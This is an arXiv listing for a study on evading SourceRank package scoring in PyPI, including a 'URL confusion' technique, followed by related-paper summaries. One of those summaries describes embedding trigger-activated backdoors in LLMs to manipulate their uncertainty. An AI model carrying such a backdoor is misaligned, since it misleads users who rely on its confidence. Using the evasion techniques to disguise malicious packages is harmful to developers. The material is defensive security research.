SourceBroken: A large-scale analysis on the (un)reliability of SourceRank in the PyPI ecosystem
- URL: http://arxiv.org/abs/2512.24400v1
- Date: Tue, 30 Dec 2025 18:34:07 GMT
- Title: SourceBroken: A large-scale analysis on the (un)reliability of SourceRank in the PyPI ecosystem
- Authors: Biagio Montaruli, Serena Elisa Ponta, Luca Compagna, Davide Balzarotti,
- Abstract summary: SourceRank is a scoring system made of 18 metrics that assess the popularity and quality of open-source packages.<n>We propose a threat model that identifies potential evasion approaches for each metric, including the URL confusion technique.<n>We study the reliability of SourceRank in the PyPI ecosystem by analyzing the SourceRank distributions of benign and malicious packages.
- Score: 10.03632278118504
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: SourceRank is a scoring system made of 18 metrics that assess the popularity and quality of open-source packages. Despite being used in several recent studies, none has thoroughly analyzed its reliability against evasion attacks aimed at inflating the score of malicious packages, thereby masquerading them as trustworthy. To fill this gap, we first propose a threat model that identifies potential evasion approaches for each metric, including the URL confusion technique, which can affect 5 out of the 18 metrics by leveraging a URL pointing to a legitimate repository potentially unrelated to the malicious package. Furthermore, we study the reliability of SourceRank in the PyPI ecosystem by analyzing the SourceRank distributions of benign and malicious packages in the state-of-the-art MalwareBench dataset, as well as in a real-world dataset of 122,398 packages. Our analysis reveals that, while historical data suggests a clear distinction between benign and malicious packages, the real-world distributions overlap significantly, mainly due to SourceRank's failure to timely reflect package removals. As a result, SourceRank cannot be reliably used to discriminate between benign and malicious packages in real-world scenarios, nor to select benign packages among those available on PyPI. Finally, our analysis reveals that URL confusion represents an emerging attack vector, with its prevalence increasing from 4.2% in MalwareBench to 7.0% in our real-world dataset. Moreover, this technique is often used alongside other evasion techniques and can significantly inflate the SourceRank metrics of malicious packages.
Related papers
- Why Authors and Maintainers Link (or Don't Link) Their PyPI Libraries to Code Repositories and Donation Platforms [83.16077040470975]
Metadata of libraries on the Python Package Index (PyPI) plays a critical role in supporting the transparency, trust, and sustainability of open-source libraries.<n>This paper presents a large-scale empirical study combining two targeted surveys sent to 50,000 PyPI authors and maintainers.<n>We analyze more than 1,400 responses using large language model (LLM)-based topic modeling to uncover key motivations and barriers related to linking repositories and donation platforms.
arXiv Detail & Related papers (2026-01-21T16:13:57Z) - One Detector Fits All: Robust and Adaptive Detection of Malicious Packages from PyPI to Enterprises [10.03632278118504]
We introduce a robust detector capable of seamless integration into both public repositories like PyPI and enterprise ecosystems.<n>To ensure robustness, we propose a novel methodology for generating adversarial packages using fine-grained code obfuscation.<n>Our detector can be seamlessly integrated into both public repositories like PyPI and enterprise ecosystems, ensuring a very low time budget of a few minutes to review the false positives.
arXiv Detail & Related papers (2025-12-03T23:53:56Z) - Towards Classifying Benign And Malicious Packages Using Machine Learning [2.8630136355252582]
Malicious open-source package detection typically requires static, dynamic analysis, or both.<n>Current dynamic analysis tools lack an automatic method to differentiate malicious packages from benign packages.<n>We propose an approach to extract the features from dynamic analysis (e.g., executed commands) and leverage machine learning techniques to automatically classify packages as benign or malicious.
arXiv Detail & Related papers (2025-11-19T01:59:11Z) - Conformal Prediction for Multi-Source Detection on a Network [59.17729745907474]
We study the multi-source detection problem.<n>Given snapshot observations of node infection status on a graph, estimate the set of source nodes that initiated the propagation.<n>We propose a novel conformal prediction framework that provides statistically valid recall guarantees for source set detection.
arXiv Detail & Related papers (2025-11-12T01:09:56Z) - Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy? [6.7341750484636975]
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks.<n>In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code.
arXiv Detail & Related papers (2025-04-18T16:11:59Z) - Lie Detector: Unified Backdoor Detection via Cross-Examination Framework [68.45399098884364]
We propose a unified backdoor detection framework in the semi-honest setting.<n>Our method achieves superior detection performance, improving accuracy by 5.4%, 1.6%, and 11.9% over SoTA baselines.<n> Notably, it is the first to effectively detect backdoors in multimodal large language models.
arXiv Detail & Related papers (2025-03-21T06:12:06Z) - A Machine Learning-Based Approach For Detecting Malicious PyPI Packages [4.311626046942916]
In modern software development, the use of external libraries and packages is increasingly prevalent.<n>This reliance on reusing code introduces serious risks for deployed software in the form of malicious packages.<n>We propose a data-driven approach that uses machine learning and static analysis to examine the package's metadata, code, files, and textual characteristics.
arXiv Detail & Related papers (2024-12-06T18:49:06Z) - Uncertainty is Fragile: Manipulating Uncertainty in Large Language Models [79.76293901420146]
Large Language Models (LLMs) are employed across various high-stakes domains, where the reliability of their outputs is crucial.
Our research investigates the fragility of uncertainty estimation and explores potential attacks.
We demonstrate that an attacker can embed a backdoor in LLMs, which, when activated by a specific trigger in the input, manipulates the model's uncertainty without affecting the final output.
arXiv Detail & Related papers (2024-07-15T23:41:11Z) - A Large-scale Fine-grained Analysis of Packages in Open-Source Software Ecosystems [13.610690659041417]
Malicious packages have less metadata content and utilize fewer static and dynamic functions than legitimate ones.
One dimension in fine-grained information (FGI) has sufficient distinguishable capability to detect malicious packages.
arXiv Detail & Related papers (2024-04-17T15:16:01Z) - RAIN: RegulArization on Input and Network for Black-Box Domain
Adaptation [80.03883315743715]
Source-free domain adaptation transits the source-trained model towards target domain without exposing the source data.
This paradigm is still at risk of data leakage due to adversarial attacks on the source model.
We propose a novel approach named RAIN (RegulArization on Input and Network) for Black-Box domain adaptation from both input-level and network-level regularization.
arXiv Detail & Related papers (2022-08-22T18:18:47Z) - Byzantine-Robust Online and Offline Distributed Reinforcement Learning [60.970950468309056]
We consider a distributed reinforcement learning setting where multiple agents explore the environment and communicate their experiences through a central server.
$alpha$-fraction of agents are adversarial and can report arbitrary fake information.
We seek to identify a near-optimal policy for the underlying Markov decision process in the presence of these adversarial agents.
arXiv Detail & Related papers (2022-06-01T00:44:53Z) - Learning while Respecting Privacy and Robustness to Distributional
Uncertainties and Adversarial Data [66.78671826743884]
The distributionally robust optimization framework is considered for training a parametric model.
The objective is to endow the trained model with robustness against adversarially manipulated input data.
Proposed algorithms offer robustness with little overhead.
arXiv Detail & Related papers (2020-07-07T18:25:25Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.